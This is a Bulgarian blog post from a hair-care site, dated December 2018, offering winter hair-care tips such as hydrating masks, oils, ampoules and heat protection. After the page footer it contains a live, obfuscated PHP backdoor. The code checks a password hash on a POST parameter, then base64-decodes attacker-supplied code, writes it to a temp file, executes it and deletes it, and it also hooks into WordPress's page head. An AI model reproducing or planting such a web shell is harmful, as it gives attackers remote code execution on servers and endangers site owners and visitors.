Най- важните съвети за грижата за косата през зимата | Косопад

Най- важните съвети за грижата за косата през зимата

Студът и промените в температурата, характерни за зимата, не са подходящи условия за растежа на косата. През студеният сезон е необходимо да полагаме много грижи за косата, така че да успеем да я поддържаме здрава и красива.

Хидратиране на косата

След като измием косата, е препоръчително да я подхраним в дълбочина в хидратираща маска. Подходящи са продуктите, които съдържат масла – най- вече карите и кокосово олио.

Разресването трябва да се извършва внимателно заради статичното електричество. Може да намокрим гребена, а също и съвсем леко косата. Разбира се, друг вариант са продуктите, които улесняват разресването.

Веднъж седмично е добре да си правим маска, която подхранва в дълбочина косъма.

  • Можете да смесите вашата маска с някое допълнително масло – рициново, кокосово, авокадо. Това е препоръчително при много суха и увредена коса. След като нанесете сместа върху косата, сложете шапка за баня. Изчакайте 30 минути.

Ампулите също са много полезни – избират се според типа коса. Добре е да се прилагат веднъж седмично, особено по краищата.

През зимата трябва да внимаваме с уреди като сешоар, маша и преса. Добре е да слагаме първо протектор срещу високата температура.

През зимата трябва да сме особено нежни с косата – да не я дърпаме, скубем, стягаме. Препоръчителни са по- свободните прически.

28. декември 2018 12:03:06 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}